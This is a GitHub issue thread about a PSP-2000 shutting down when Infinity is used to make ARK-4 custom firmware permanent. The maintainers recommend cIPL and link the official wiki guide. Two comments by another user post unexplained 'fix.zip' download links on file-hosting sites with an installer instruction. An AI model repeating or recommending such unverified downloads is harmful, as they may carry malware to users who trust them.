PSP-Archive/ARK-4 #394: Infinity doesn't open to make ARK-4 permanent.

LonelyALpHaz, 2024-08-24:
### PSP/Vita Model

PSP-2000 (Slim)

### ARK Version

dc31ca3611223517a4840f9a86b251aed5f117be

### Steps to reproduce

1. Open ARK Loader to inject the new CFW.
2. Restart the console.
3. Open Infinity for the first time and press X to install it.
4. Open Infinity again to select ARK-4 (this is where the error occurs, the screen stays black for a while, then a small noise can be heard from the speakers, and the console completely shuts down.).

https://github.com/user-attachments/assets/0d0c2077-5020-44fe-ae86-624e6aa6566d

### USB Charge

Disabled

### Overclock

Disabled

### Power Save

Disabled

### Balanced Energy Mode

Disabled

### Autoboot Launcher

Off

### Disable PSP Go Pause

Off

### Unlock Extra Memory

Disabled

### Memory Stick Speedup

Disabled

### Inferno Cache

Off

### Skip Sony Logos

Off

### Hide PIC0 and PIC1

Off

### Hide MAC Address

Off

### Hide DLC

Off

### Turn off LEDs

Disabled

### Verification of form.

- [X] I agree that I properly filled out the items listed above.

closed 2024-08-24 by LonelyALpHaz

krazynez, 2024-08-25:
Why use Infinity when you can just use cIPL instead?

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

LonelyALpHaz, 2024-08-25:
First of all, I appreciate all the help and apologize for the delayed response. I managed to solve the error by redoing the process. After reinstalling Infinity, I loaded the ARK Loader, opened Infinity a second time to make ARK-4 permanent, and everything worked out.

JoseAaronLopezGarcia, 2024-08-26:
> First of all, I appreciate all the help and apologize for the delayed response. I managed to solve the error by redoing the process. After reinstalling Infinity, I loaded the ARK Loader, opened Infinity a second time to make ARK-4 permanent, and everything worked out.

Why use Infinity? cIPL is superior.

LonelyALpHaz, 2024-08-26:
> Why use Infinity? cIPL is superior.

I was following a tutorial I found about ARK-4, and since it was a bit old, it still used Infinity to make the ARK permanent. I didn’t pay attention to that detail.

If it’s possible to remove ARK-4 and Infinity to use cIPL, I can redo the jailbreak process.

krazynez, 2024-08-26:
> > Why use Infinity? cIPL is superior.
> 
> I was following a tutorial I found about ARK-4, and since it was a bit old, it still used Infinity to make the ARK permanent. I didn’t pay attention to that detail.
> 
> If it’s possible to remove ARK-4 and Infinity to use cIPL, I can redo the jailbreak process.

Yes you can use ChronoSwitch to revert back to OFW and then run ARK Loader then cIPL. [Here is a guide via our wiki](https://github.com/PSP-Archive/ARK-4/wiki/cIPL)

LonelyALpHaz, 2024-08-26:
> Yes you can use ChronoSwitch to revert back to OFW and then run ARK Loader then cIPL. [Here is a guide via our wiki](https://github.com/PSP-Archive/ARK-4/wiki/cIPL)

Thank you very much! This time I will follow the official guide